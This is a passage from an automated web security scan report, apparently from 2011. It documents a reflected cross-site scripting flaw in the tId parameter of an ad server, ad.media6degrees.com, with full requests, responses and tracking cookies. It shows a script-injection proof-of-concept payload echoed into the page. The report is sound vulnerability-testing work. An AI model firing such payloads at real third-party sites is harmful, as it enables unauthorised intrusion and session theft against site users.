g3n0516sjll1dpj000000013n0112yxlkxrxz0000000i3n0515iglkxq0l0000000k3n0513n7lkze3y0000000e3n0516s2lkxpyu0000000l3n0514hplkxlm50000000o3n050znmlk34620000001h3n0514hclkxlm50000000o3n050wd7lkze3o0000000g3n05102plkxrxz0000000i3n0510tylkkpku000000153n050p1alkze3o0000000g3n0500bvlk9pe80000001d3n0515xylk60qe0000001g3n0510lxlkxrxz0000000i3n05103blkxrxz0000000i3n0510telkd7nq0000001b3n0516rslkxppm0000000m3n050c9slk9pe80000001d3n0513mxlkze3o0000000g3n0512emlkze3o0000000g3n0510rdlkdkly000000193n050z9zlkze3y0000000e3n05163plkxlm50000000o3n050z9xlkze3o0000000g3n050m40lkkxrb0000000y3n050zqylkxrxz0000000i3n050mjelkkxrb0000000y3n0512qnlkkplt000000133n0512x6lkxrxz0000000i3n0514e9lkze3o0000000g3n051342lkze3y0000000e3n0516aulkze3o0000000g3n0516atlkxlm50000000o3n051203lkb5u20000001c3n05163clkxlm50000000o3n050afqlkze3o0000000g3n050o0vlkkpqx000000103n050z2ilkkxrb0000000y3n05; sglst=2280sbpelkxlm5026sw00f3m000k00500dsnlkxlm503s3e00o3n050k0o50oarllkxlm503s3e00o3n050k0o50ocg5lkxlm5026sw00o3n050k0o50o9rslkkpke0go550163n050k0p516am5lkkxr8002zw00z3n050k0p50zcd4lkxlm5026sw00f3m000k00500crglkxlm5026sw00o3n050k0o50ocnolkxlm5026sw00o3n050k0o50oabelkxlm5026sw00o3n050k0o50odd8lkxlm5026sw00f3m000k00500cy2lkxlm5026sw00o3n050k0o50oaoplkb5u209jqc0063e000j00500cnxlkxlm503s3e00o3n050k0o50oe3qll1dpj000000013n010k01501bq3lkxlm5026sw00o3n050k0o50obvplkxlm5026sw00f3m000k00500aoilkxlm503s3e00n3n000k00500942lkb5u20mfs300o3l000k005008ndlkb5u20mfs300o3l000k005009ullkxlm503s3e00n3n000k00500bvclkxlm5026sw00o3n050k0o50oc5flkxlm5026sw00o3n050k0o50o56blkb5u20mfs300o3l000k00500bjqlkxlm5026sw00o3n050k0o50oawklkxlm5026sw00o3n050k0o50oasulkb5u209jqc0063e000j00500crplkxlm503s3e00n3n000k00500asqlkxlm5026sw00o3n050k0o50oc5rlkov6e0000000r3n050k0p50raw8lkxlm503s3e00o3n050k0o50oc60lkxlm5026sw00o3n050k0o50odc4lkxlm5026sw00o3n050k0o50od26lkxlm5026sw00o3n050k0o50odnjlkxlm503s3e00o3n050k0o50ocbclkxlm5026sw00o3n050k0o50oc85lkxlm5026sw00o3n050k0o50ocsslkxlm503s3e00o3n050k0o50oc80lkb5u209jqc0063e000j00500ag2lkd7nq0o61t01b3n050k0p518c1elkxlm5026sw00o3n050k0o50oc81lkkpke0cw1r00i3l000k005009grlkxlm5026sw00o3n050k0o50oc8flkxlm5026sw00o3n050k0o50oa6slkkpke0cw1r00i3l000k00500dnalkxlm5026sw00o3n050k0o50o9z6lkxlm5026sw00o3n050k0o50odbtlkxlm5026sw00o3n050k0o50o9q4lkxlm5026sw00o3n050k0o50odyllkxlm5026sw00o3n050k0o50o0kllklhm40c4010053l000k005009q5lkb5u20mfs300o3l000k00500b3zlkxlm503s3e00n3n000k005000t7ljyxb412gef01j3n050k0p518dgflkkpke0f2un0163n050k0p5169mjlkxlm5026sw00f3m000k00500bo0lkb5u20q7vh01b3n000k00500bo1lkkyy00cmo50093l000k005009pglkxlm5026sw00o3n050k0o50ocwalkxlm5026sw00o3n050k0o50od86lklhm40c4010053l000k00500d84lkxlm5026sw00o3n050k0o50odqllkxlm5026sw00o3n050k0o50odz3lkxlm5026sw00f3m000k00500cm6lkxlm5026sw00o3n050k0o50ocxdlkxlm503s3e00o3n050k0o50o719lkb5u20omkz00u3n050k0o50p71alkkpke0cw1r00i3l000k00500ctplkxlm5026sw00o3n050k0o50occ3lkxlm5026sw00o3n050k0o50odgilkb5u209jqc0063e000j00500cthlkxlm5026sw00o3n050k0o50o4wclkb5u20q7vh00t3n000k005005mrlkb5u20mfs300o3l000k00500a0ulkxlm503s3e00n3n000k00500arilkxlm5026sw00f3m000k00500e0yll1dpj000000013n010k01501bwjlkkyy00gerj00x3n050k0p50xcbplkxlm5026sw00o3n050k0o50o9gelkxlm503s3e00n3n000k00500; vstcnt=417k020o01dfngheqnlsvaqf150v10l20r1w4exqe103210524qhoq103210524slly127p20f20g24exp6103210e249v4u10pj10e24ru4y103210722te10tq10a24f69z103210f24n86o103210d24pq44103210a24eflo218e104203210724f204103210524na8i103210e24eyja103210e24mqca103210e24nsyl103210f24l16a218e10f203210l24fz24103210924bgpn103210524o3dr103210l24cj2d103210224e1a9103210l24gqhl103210924d3rk10pj10m23sti21hj10a203210e24g197103210524ns52103210l24fqsv103210l24nnav103210f22wb11m520l20m24uzg6218e100203220020324tfmw103210b24flbl103210424qpgs103210324tc6l103210e24f5tg103210324tmhw103210924q8ci103210l24m4sm103210524elor218e10l203210m24uu1v103210m24f9wk103210i24jxig103210f24fvio218e20e20f203210f24uzpw218e10f203210l24eo2u103210624e8bw10321082496o0103210l24fsuv103210924fduc218e10a203210e24ef19103210l24uzdp103210b24dret103210724e9pa10321042451gt10pj10e24styu103210924cnyl103210g24er21103210m24o2lt103210a24fj52103210924m1v2103210a23eoh127p10l24f7qr218e108203210924fgv9218e108203210a24qnab103210023l4f103210a24kd6k103210c24hqyp103210i2

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: CP="COM NAV INT STA NID OUR IND NOI"
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: adh=1lkkxr8160952rf011et018qzlZAsw500gi2t52rc011qy047t/iBG61e00gej07rxkxOK2C00gegz7pwZhKq0500gef6mLlY5BlsL003xfa54rg012pw01RcyZZBCFM00ei4o4l12012pw01Ra2uRD8cN00ei2y58j30136z01Q02eRPDiG00eh4b4tmb012v701QWYNRLUMp00egcp4tm3012v701QWJzhCSHC00egcf4w5q011qy01mLbKRCxkE003xf64qj9010gs02QopkpBIIf0002zwOyHUBHBSQ000000; Domain=media6degrees.com; Expires=Mon, 07-Nov-2011 15:46:49 GMT; Path=/
Set-Cookie: clid=2ljtllp01170xrd52zkwjuxh17u8c01n3n060k0q519; Domain=media6degrees.com; Expires=Mon, 07-Nov-2011 15:46:49 GMT; Path=/
Set-Cookie: orblb=""; Domain=media6degrees.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rdrlst=4320pahlkze3o0000000h3n06157olkxlm50000000p3n06144qlkze3o0000000h3n0613y7lkze3o0000000h3n060hsnlkze3o0000000h3n0615sklkkpqq000000123n0612nslkxrxz0000000j3n0612gdlkkyy00000000y3n060morlkkxrb0000000z3n0614k6lkxlm50000000p3n060w35lkze3o0000000h3n0613pylkze3o0000000h3n0614rwlkxlm50000000p3n061628lkze3y0000000f3n06132dlkzsmp000000083n0614khlkxlm50000000p3n061196lkkkbe000000183n0613x4lkxrxz0000000j3n0613qmlkze3y0000000f3n061195lkkpqh000000133n061194lkkjj4000000193n0616nulkxlm50000000p3n0613q8lkze3y0000000f3n061193lkkplo000000153n061192lkkpke000000173n060p46lkkpqq000000123n060zg4lkze3y0000000f3n06144elkze3o0000000h3n0613qwlkze4r0000000e3n0610poljyxb40000001k3n06106llkzt2k000000073n060e6llkl0r50000000v3n0616dnlkze3o0000000h3n06138olkxrxz0000000j3n0616y4ll1dpj000000023n02167ulkxq410000000k3n06159olk8fax0000001f3n0614qllkxlm50000000p3n0615halkxlm50000000p3n060m0plkkxrb0000000z3n0616e6lkxnbq0000000o3n0613zblkze3y0000000f3n0614xnlkxlm50000000p3n0616dxlkze3o0000000h3n061391lkxrxz0000000j3n0615zhlkze3y0000000f3n061672lkkxrb0000000z3n060ycrlkncow0000000t3n060okclkze3o0000000h3n06158mlkze3o0000000h3n061015lkze3y0000000f3n0613lelkxrxz0000000j3n0613yolkze3o0000000h3n060ojulkze3o0000000h3n061240lkxrxz0000000j3n0614ozlkxlm50000000p3n0614bmlkxrxz0000000j3n061590lkzsm2000000093n0614j7lkxlm50000000p3n0614bzlkxlm50000000p3n0611pjlkxrxz0000000j3n060p01lkze3o0000000h3n0615holkxlm50000000p3n060m7alkkxrb0000000z3n0613mklkxrxz0000000j3n06101ulkze3o0000000h3n0612zglkxrxz0000000j3n0613lxlkxrxz0000000j3n060zp4lkze3o0000000h3n06148ilkxlm50000000p3n060xvclkze3o0000000h3n0616sjll1dpj000000023n0212yxlkxrxz0000000j3n0615iglkxq0l0000000l3n0613n7lkze3y0000000f3n0616s2lkxpyu0000000m3n0614hplkxlm50000000p3n060znmlk34620000001i3n0614hclkxlm50000000p3n060wd7lkze3o0000000h3n06102plkxrxz0000000j3n0610tylkkpku000000163n060p1alkze3o0000000h3n0600bvlk9pe80000001e3n0615xylk60qe0000001h3n0610lxlkxrxz0000000j3n06103blkxrxz0000000j3n0610telkd7nq0000001c3n0616rslkxppm0000000n3n060c9slk9pe80000001e3n0613mxlkze3o0000000h3n0612emlkze3o0000000h3n0610rdlkdkly0000001a3n060z9zlkze3y0000000f3n06163plkxlm50000000p3n060z9xlkze3o0000000h3n060m40lkkxrb0000000z3n060zqylkxrxz0000000j3n060mjelkkxrb0000000z3n0612qnlkkplt000000143n0614e9lkze3o0000000h3n0612x6lkxrxz0000000j3n061342lkze3y0000000f3n0616aulkze3o0000000h3n0616atlkxlm50000000p3n061203lkb5u20000001d3n06163clkxlm50000000p3n060afqlkze3o0000000h3n060o0vlkkpqx000000113n060z2ilkkxrb0000000z3n06; Domain=media6degrees.com; Expires=Mon, 07-Nov-2011 15:46:49 GMT; Path=/
Set-Cookie: sglst=2280sbpelkxlm5026sw00f3m000k00500dsnlkxlm503s3e00p3n060k0p50parllkxlm503s3e00p3n060k0p50pcg5lkxlm5026sw00p3n060k0p50p9rslkkpke0go550173n060k0q517am5lkkxr8002zw0103n060k0q510cd4lkxlm5026sw00f3m000k00500crglkxlm5026sw00p3n060k0p50pcnolkxlm5026sw00p3n060k0p50pabelkxlm5026sw00p3n060k0p50pdd8lkxlm5026sw00f3m000k00500cy2lkxlm5026sw00p3n060k0p50paoplkb5u209jqc0063e000j00500cnxlkxlm503s3e00p3n060k0p50pe3qll1dpj000000023n020k02502bq3lkxlm5026sw00p3n060k0p50paoilkxlm503s3e00n3n000k00500bvplkxlm5026sw00f3m000k00500942lkb5u20mfs300o3l000k005009ullkxlm503s3e00n3n000k005008ndlkb5u20mfs300o3l000k00500bvclkxlm5026sw00p3n060k0p50pc5flkxlm5026sw00p3n060k0p50p56blkb5u20mfs300o3l000k00500bjqlkxlm5026sw00p3n060k0p50pawklkxlm5026sw00p3n060k0p50pasulkb5u209jqc0063e000j00500crplkxlm503s3e00n3n000k00500asqlkxlm5026sw00p3n060k0p50pc5rlkov6e0000000s3n060k0q50saw8lkxlm503s3e00p3n060k0p50pc60lkxlm5026sw00p3n060k0p50pdc4lkxlm5026sw00p3n060k0p50pd26lkxlm5026sw00p3n060k0p50pdnjlkxlm503s3e00p3n060k0p50pcbclkxlm5026sw00p3n060k0p50pc85lkxlm5026sw00p3n060k0p50pcsslkxlm503s3e00p3n060k0p50pc80lkb5u209jqc0063e000j00500ag2lkd7nq0o86b01c3n060k0q519c1elkxlm5026sw00p3n060k0p50pc81lkkpke0cw1r00i3l000k005009grlkxlm5026sw00p3n060k0p50pc8flkxlm5026sw00p3n060k0p50pa6slkkpke0cw1r00i3l000k00500dnalkxlm5026sw00p3n060k0p50p9z6lkxlm5026sw00p3n060k0p50pdbtlkxlm5026sw00p3n060k0p50p0kllklhm40c4010053l000k00500dyllkxlm5026sw00p3n060k0p50p9q4lkxlm5026sw00p3n060k0p50pb3zlkxlm503s3e00n3n000k005009q5lkb5u20mfs300o3l000k005009mjlkxlm5026sw00f3m000k00500dgflkkpke0f2un0173n060k0q5170t7ljyxb412iix01k3n060k0q519bo0lkb5u20q7vh01b3n000k00500bo1lkkyy00cmo50093l000k005009pglkxlm5026sw00p3n060k0p50pd86lklhm40c4010053l000k00500cwalkxlm5026sw00p3n060k0p50pdqllkxlm5026sw00p3n060k0p50pd84lkxlm5026sw00p3n060k0p50pdz3lkxlm5026sw00f3m000k00500cm6lkxlm5026sw00p3n060k0p50pcxdlkxlm503s3e00p3n060k0p50p719lkb5u20omkz00v3n060k0p50q71alkkpke0cw1r00i3l000k00500ctplkxlm5026sw00p3n060k0p50pcc3lkxlm5026sw00p3n060k0p50pdgilkb5u209jqc0063e000j00500cthlkxlm5026sw00p3n060k0p50p4wclkb5u20q7vh00t3n000k00500a0ulkxlm503s3e00n3n000k005005mrlkb5u20mfs300o3l000k00500arilkxlm5026sw00f3m000k00500e0yll1dpj000000023n020k02502cbplkxlm5026sw00p3n060k0p50pbwjlkkyy00gerj00y3n060k0q50y9gelkxlm503s3e00n3n000k00500; Domain=media6degrees.com; Expires=Mon, 07-Nov-2011 15:46:49 GMT; Path=/
Set-Cookie: vstcnt=417k020o01dfngheqnlsvaqf150v10l20r1w4exqe103210524qhoq103210524slly127p20f20g24exp6103210e249v4u10pj10e24ru4y103210722te10tq10a24f69z103210f24n86o103210d24pq44103210a24eflo218e104203210724eyja103210e24f204103210524na8i103210e24mqca103210e24nsyl103210f24l16a218e10f203210l24fz24103210924o3dr103210l24bgpn103210524cj2d103210224gqhl103210924e1a9103210l23sti21hj10a203210e24d3rk10pj10m24g197103210524ns52103210l24fqsv103210l24nnav103210f22wb11m520l20m24uzg6218e100203220020324tfmw103210b24flbl103210424qpgs103210324tc6l103210e24f5tg103210324tmhw103210924q8ci103210l24m4sm103210524elor218e10l203210m24uu1v103210m24f9wk103210i24jxig103210f24fvio218e20e20f203210f24uzpw218e10f203210l24eo2u103210624e8bw10321082496o0103210l24fsuv103210924fduc218e10a203210e24ef19103210l24dret103210724uzdp103210b24e9pa103210424cnyl103210g24styu10321092451gt10pj10e24er21103210m24fj52103210924o2lt103210a23eoh127p10l24m1v2103210a24f7qr218e108203210924qnab103210024fgv9218e108203210a24hqyp103210i24kd6k103210c23l4f103210a2; Domain=media6degrees.com; Expires=Mon, 07-Nov-2011 15:46:49 GMT; Path=/
Content-Type: text/html;charset=ISO-8859-1
Date: Wed, 11 May 2011 15:46:48 GMT
Content-Length: 2991

<SCRIPT language='JavaScript1.1' SRC="http://ad.doubleclick.net/adj/N4270.Media6Degrees.com/B5279322.4;sz=728x90;pc=[TPAS_ID];click0=http://ad.media6degrees.com/adserv/clk?tId=17076761397480505|cId=58
...[SNIP]...
9QYWNrLzU2MjcvmALyDMACBcgC0dHPDOACAOoCDENvbnRlc3RzLTcyOKgDAegDROgDjwfoA-AH9QMAAADE4AQBgAb8-MD-7bDXrCI%26num%3D1%26sig%3DAGiWqtwAxkWGQiJelWcUNQXgzlTbn5P7nQ%26client%3Dca-pub-9674942009345807%26adurl%3D&da183"><script>alert(1)</script>d968ef71f8d=1;ord=1305128809439">
...[SNIP]...

5.89. http://ad.media6degrees.com/adserv/cs [tId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.media6degrees.com
Path:   /adserv/cs

Issue detail

The value of the tId request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6a55c"><script>alert(1)</script>2825b35e074 was submitted in the tId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adserv/cs?tId=17076761397480505|cb=1305126201|adType=iframe|cId=5806|ec=1|spId=32352|advId=891|exId=20|price=TcqlOAAMd9kK5V2jQjwM_tBIgk23wvxbGO4ENg|pubId=400|secId=57|invId=1829|notifyServer=asd155.sd.pl.pvt|notifyPort=8080|bid=1.83|srcUrlEnc=http://www.starpulse.com/Contests/Fast_Five_Prize_Pack/5627/|ctrack=http://adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBqrptOKXKTdnvMaO7lQf-mfCRBP-unYMC5-rKljCf_6ONYAAQARgBIAA4AVCAx-HEBGDJhoWJiKSEEIIBF2NhLXB1Yi05Njc0OTQyMDA5MzQ1ODA3oAGLgMjrA7IBEXd3dy5zdGFycHVsc2UuY29tugEJNzI4eDkwX2FzyAEJ2gE8aHR0cDovL3d3dy5zdGFycHVsc2UuY29tL0NvbnRlc3RzL0Zhc3RfRml2ZV9Qcml6ZV9QYWNrLzU2MjcvmALyDMACBcgC0dHPDOACAOoCDENvbnRlc3RzLTcyOKgDAegDROgDjwfoA-AH9QMAAADE4AQBgAb8-MD-7bDXrCI%26num%3D1%26sig%3DAGiWqtwAxkWGQiJelWcUNQXgzlTbn5P7nQ%26client%3Dca-pub-9674942009345807%26adurl%3D6a55c"><script>alert(1)</script>2825b35e074 HTTP/1.1
Host: ad.media6degrees.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ipinfo=2lkkjj40zijsvn5yhbqbe90httd3GK520752HF6QnyynflFbsgYnlreGrpuabybtvrf00; acs=016020a0e0f0g0h1ljtllpxzt117s3uxzt1tr37xzt1tr37xzt117s3uxzt117rw8; adh="1lkkxr8160852rc011qy047t/iBG61e00gej07rxkxOK2C00gegz7pwZhKq0500gef6mLlY5BlsL003xfa54rg012pw01RcyZZBCFM00ei4o4l12012pw01Ra2uRD8cN00ei2y58j30136z01Q02eRPDiG00eh4b4tmb012v701QWYNRLUMp00egcp4tm3012v701QWJzhCSHC00egcf4w5q011qy01mLbKRCxkE003xf64qj9010gs02QopkpBIIf0002zwOyHUBHBSQ000000"; clid=2ljtllp01170xrd52zkwjuxh17s3u01m3n050k0p518; rdrlst=4320pahlkze3o0000000g3n05144qlkze3o0000000g3n05157olkxlm50000000o3n0513y7lkze3o0000000g3n0515sklkkpqq000000113n050hsnlkze3o0000000g3n0512nslkxrxz0000000i3n0512gdlkkyy00000000x3n050morlkkxrb0000000y3n0514k6lkxlm50000000o3n050w35lkze3o0000000g3n0513pylkze3o0000000g3n0514rwlkxlm50000000o3n051628lkze3y0000000e3n05132dlkzsmp000000073n0514khlkxlm50000000o3n051196lkkkbe000000173n0513x4lkxrxz0000000i3n0513qmlkze3y0000000e3n051195lkkpqh000000123n051194lkkjj4000000183n0516nulkxlm50000000o3n0513q8lkze3y0000000e3n051193lkkplo000000143n050p46lkkpqq000000113n051192lkkpke000000163n050zg4lkze3y0000000e3n0513qwlkze4r0000000d3n05144elkze3o0000000g3n0510poljyxb40000001j3n050e6llkl0r50000000u3n05106llkzt2k000000063n05138olkxrxz0000000i3n0516dnlkze3o0000000g3n0516y4ll1dpj000000013n01167ulkxq410000000j3n0514qllkxlm50000000o3n05159olk8fax0000001e3n0515halkxlm50000000o3n050m0plkkxrb0000000y3n0516e6lkxnbq0000000n3n0513zblkze3y0000000e3n0514xnlkxlm50000000o3n0516dxlkze3o0000000g3n051391lkxrxz0000000i3n051672lkkxrb0000000y3n0515zhlkze3y0000000e3n050ycrlkncow0000000s3n050okclkze3o0000000g3n05158mlkze3o0000000g3n051015lkze3y0000000e3n0513lelkxrxz0000000i3n0513yolkze3o0000000g3n050ojulkze3o0000000g3n051240lkxrxz0000000i3n0514ozlkxlm50000000o3n0514bmlkxrxz0000000i3n051590lkzsm2000000083n0514j7lkxlm50000000o3n0514bzlkxlm50000000o3n0511pjlkxrxz0000000i3n050p01lkze3o0000000g3n0515holkxlm50000000o3n050m7alkkxrb0000000y3n0513mklkxrxz0000000i3n05101ulkze3o0000000g3n0512zglkxrxz0000000i3n0513lxlkxrxz0000000i3n050zp4lkze3o0000000g3n05148ilkxlm50000000o3n050xvclkze3o0000000g3n0516sjll1dpj000000013n0112yxlkxrxz0000000i3n0515iglkxq0l0000000k3n0513n7lkze3y0000000e3n0516s2lkxpyu0000000l3n0514hplkxlm50000000o3n050znmlk34620000001h3n0514hclkxlm50000000o3n050wd7lkze3o0000000g3n05102plkxrxz0000000i3n0510tylkkpku000000153n050p1alkze3o0000000g3n0500bvlk9pe80000001d3n0515xylk60qe0000001g3n0510lxlkxrxz0000000i3n05103blkxrxz0000000i3n0510telkd7nq0000001b3n0516rslkxppm0000000m3n050c9slk9pe80000001d3n0513mxlkze3o0000000g3n0512emlkze3o0000000g3n0510rdlkdkly000000193n050z9zlkze3y0000000e3n05163plkxlm50000000o3n050z9xlkze3o0000000g3n050m40lkkxrb0000000y3n050zqylkxrxz0000000i3n050mjelkkxrb0000000y3n0512qnlkkplt000000133n0512x6lkxrxz0000000i3n0514e9lkze3o0000000g3n051342lkze3y0000000e3n0516aulkze3o0000000g3n0516atlkxlm50000000o3n051203lkb5u20000001c3n05163clkxlm50000000o3n050afqlkze3o0000000g3n050o0vlkkpqx000000103n050z2ilkkxrb0000000y3n05; sglst=2280sbpelkxlm5026sw00f3m000k00500dsnlkxlm503s3e00o3n050k0o50oarllkxlm503s3e00o3n050k0o50ocg5lkxlm5026sw00o3n050k0o50o9rslkkpke0go550163n050k0p516am5lkkxr8002zw00z3n050k0p50zcd4lkxlm5026sw00f3m000k00500crglkxlm5026sw00o3n050k0o50ocnolkxlm5026sw00o3n050k0o50oabelkxlm5026sw00o3n050k0o50odd8lkxlm5026sw00f3m000k00500cy2lkxlm5026sw00o3n050k0o50oaoplkb5u209jqc0063e000j00500cnxlkxlm503s3e00o3n050k0o50oe3qll1dpj000000013n010k01501bq3lkxlm5026sw00o3n050k0o50obvplkxlm5026sw00f3m000k00500aoilkxlm503s3e00n3n000k00500942lkb5u20mfs300o3l000k005008ndlkb5u20mfs300o3l000k005009ullkxlm503s3e00n3n000k00500bvclkxlm5026sw00o3n050k0o50oc5flkxlm5026sw00o3n050k0o50o56blkb5u20mfs300o3l000k00500bjqlkxlm5026sw00o3n050k0o50oawklkxlm5026sw00o3n050k0o50oasulkb5u209jqc0063e000j00500crplkxlm503s3e00n3n000k00500asqlkxlm5026sw00o3n050k0o50oc5rlkov6e0000000r3n050k0p50raw8lkxlm503s3e00o3n050k0o50oc60lkxlm5026sw00o3n050k0o50odc4lkxlm5026sw00o3n050k0o50od26lkxlm5026sw00o3n050k0o50odnjlkxlm503s3e00o3n050k0o50ocbclkxlm5026sw00o3n050k0o50oc85lkxlm5026sw00o3n050k0o50ocsslkxlm503s3e00o3n050k0o50oc80lkb5u209jqc0063e000j00500ag2lkd7nq0o61t01b3n050k0p518c1elkxlm5026sw00o3n050k0o50oc81lkkpke0cw1r00i3l000k005009grlkxlm5026sw00o3n050k0o50oc8flkxlm5026sw00o3n050k0o50oa6slkkpke0cw1r00i3l000k00500dnalkxlm5026sw00o3n050k0o50o9z6lkxlm5026sw00o3n050k0o50odbtlkxlm5026sw00o3n050k0o50o9q4lkxlm5026sw00o3n050k0o50odyllkxlm5026sw00o3n050k0o50o0kllklhm40c4010053l000k005009q5lkb5u20mfs300o3l000k00500b3zlkxlm503s3e00n3n000k005000t7ljyxb412gef01j3n050k0p518dgflkkpke0f2un0163n050k0p5169mjlkxlm5026sw00f3m000k00500bo0lkb5u20q7vh01b3n000k00500bo1lkkyy00cmo50093l000k005009pglkxlm5026sw00o3n050k0o50ocwalkxlm5026sw00o3n050k0o50od86lklhm40c4010053l000k00500d84lkxlm5026sw00o3n050k0o50odqllkxlm5026sw00o3n050k0o50odz3lkxlm5026sw00f3m000k00500cm6lkxlm5026sw00o3n050k0o50ocxdlkxlm503s3e00o3n050k0o50o719lkb5u20omkz00u3n050k0o50p71alkkpke0cw1r00i3l000k00500ctplkxlm5026sw00o3n050k0o50occ3lkxlm5026sw00o3n050k0o50odgilkb5u209jqc0063e000j00500cthlkxlm5026sw00o3n050k0o50o4wclkb5u20q7vh00t3n000k005005mrlkb5u20mfs300o3l000k00500a0ulkxlm503s3e00n3n000k00500arilkxlm5026sw00f3m000k00500e0yll1dpj000000013n010k01501bwjlkkyy00gerj00x3n050k0p50xcbplkxlm5026sw00o3n050k0o50o9gelkxlm503s3e00n3n000k00500; vstcnt=417k020o01dfngheqnlsvaqf150v10l20r1w4exqe103210524qhoq103210524slly127p20f20g24exp6103210e249v4u10pj10e24ru4y103210722te10tq10a24f69z103210f24n86o103210d24pq44103210a24eflo218e104203210724f204103210524na8i103210e24eyja103210e24mqca103210e24nsyl103210f24l16a218e10f203210l24fz24103210924bgpn103210524o3dr103210l24cj2d103210224e1a9103210l24gqhl103210924d3rk10pj10m23sti21hj10a203210e24g197103210524ns52103210l24fqsv103210l24nnav103210f22wb11m520l20m24uzg6218e100203220020324tfmw103210b24flbl103210424qpgs103210324tc6l103210e24f5tg103210324tmhw103210924q8ci103210l24m4sm103210524elor218e10l203210m24uu1v103210m24f9wk103210i24jxig103210f24fvio218e20e20f203210f24uzpw218e10f203210l24eo2u103210624e8bw10321082496o0103210l24fsuv103210924fduc218e10a203210e24ef19103210l24uzdp103210b24dret103210724e9pa10321042451gt10pj10e24styu103210924cnyl103210g24er21103210m24o2lt103210a24fj52103210924m1v2103210a23eoh127p10l24f7qr218e108203210924fgv9218e108203210a24qnab103210023l4f103210a24kd6k103210c24hqyp103210i2

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: CP="COM NAV INT STA NID OUR IND NOI"
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: adh=1lkkxr8160952rf011et018qzlZAsw500gi2e52rc011qy047t/iBG61e00gej07rxkxOK2C00gegz7pwZhKq0500gef6mLlY5BlsL003xfa54rg012pw01RcyZZBCFM00ei4o4l12012pw01Ra2uRD8cN00ei2y58j30136z01Q02eRPDiG00eh4b4tmb012v701QWYNRLUMp00egcp4tm3012v701QWJzhCSHC00egcf4w5q011qy01mLbKRCxkE003xf64qj9010gs02QopkpBIIf0002zwOyHUBHBSQ000000; Domain=media6degrees.com; Expires=Mon, 07-Nov-2011 15:46:34 GMT; Path=/
Set-Cookie: clid=2ljtllp01170xrd52zkwjuxh17u7x01n3n060k0q519; Domain=media6degrees.com; Expires=Mon, 07-Nov-2011 15:46:34 GMT; Path=/
Set-Cookie: orblb=""; Domain=media6degrees.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rdrlst=4320pahlkze3o0000000h3n06157olkxlm50000000p3n06144qlkze3o0000000h3n0613y7lkze3o0000000h3n060hsnlkze3o0000000h3n0615sklkkpqq000000123n0612nslkxrxz0000000j3n0612gdlkkyy00000000y3n060morlkkxrb0000000z3n0614k6lkxlm50000000p3n060w35lkze3o0000000h3n0613pylkze3o0000000h3n0614rwlkxlm50000000p3n061628lkze3y0000000f3n06132dlkzsmp000000083n0614khlkxlm50000000p3n061196lkkkbe000000183n0613x4lkxrxz0000000j3n0613qmlkze3y0000000f3n061195lkkpqh000000133n061194lkkjj4000000193n0616nulkxlm50000000p3n0613q8lkze3y0000000f3n061193lkkplo000000153n061192lkkpke000000173n060p46lkkpqq000000123n060zg4lkze3y0000000f3n06144elkze3o0000000h3n0613qwlkze4r0000000e3n0610poljyxb40000001k3n06106llkzt2k000000073n060e6llkl0r50000000v3n0616dnlkze3o0000000h3n06138olkxrxz0000000j3n0616y4ll1dpj000000023n02167ulkxq410000000k3n06159olk8fax0000001f3n0614qllkxlm50000000p3n0615halkxlm50000000p3n060m0plkkxrb0000000z3n0616e6lkxnbq0000000o3n0613zblkze3y0000000f3n0614xnlkxlm50000000p3n0616dxlkze3o0000000h3n061391lkxrxz0000000j3n0615zhlkze3y0000000f3n061672lkkxrb0000000z3n060ycrlkncow0000000t3n060okclkze3o0000000h3n06158mlkze3o0000000h3n061015lkze3y0000000f3n0613lelkxrxz0000000j3n0613yolkze3o0000000h3n060ojulkze3o0000000h3n061240lkxrxz0000000j3n0614ozlkxlm50000000p3n0614bmlkxrxz0000000j3n061590lkzsm2000000093n0614j7lkxlm50000000p3n0614bzlkxlm50000000p3n0611pjlkxrxz0000000j3n060p01lkze3o0000000h3n0615holkxlm50000000p3n060m7alkkxrb0000000z3n0613mklkxrxz0000000j3n06101ulkze3o0000000h3n0612zglkxrxz0000000j3n0613lxlkxrxz0000000j3n060zp4lkze3o0000000h3n06148ilkxlm50000000p3n060xvclkze3o0000000h3n0616sjll1dpj000000023n0212yxlkxrxz0000000j3n0615iglkxq0l0000000l3n0613n7lkze3y0000000f3n0616s2lkxpyu0000000m3n0614hplkxlm50000000p3n060znmlk34620000001i3n0614hclkxlm50000000p3n060wd7lkze3o0000000h3n06102plkxrxz0000000j3n0610tylkkpku000000163n060p1alkze3o0000000h3n0600bvlk9pe80000001e3n0615xylk60qe0000001h3n0610lxlkxrxz0000000j3n06103blkxrxz0000000j3n0610telkd7nq0000001c3n0616rslkxppm0000000n3n060c9slk9pe80000001e3n0613mxlkze3o0000000h3n0612emlkze3o0000000h3n0610rdlkdkly0000001a3n060z9zlkze3y0000000f3n06163plkxlm50000000p3n060z9xlkze3o0000000h3n060m40lkkxrb0000000z3n060zqylkxrxz0000000j3n060mjelkkxrb0000000z3n0612qnlkkplt000000143n0614e9lkze3o0000000h3n0612x6lkxrxz0000000j3n061342lkze3y0000000f3n0616aulkze3o0000000h3n0616atlkxlm50000000p3n061203lkb5u20000001d3n06163clkxlm50000000p3n060afqlkze3o0000000h3n060o0vlkkpqx000000113n060z2ilkkxrb0000000z3n06; Domain=media6degrees.com; Expires=Mon, 07-Nov-2011 15:46:34 GMT; Path=/
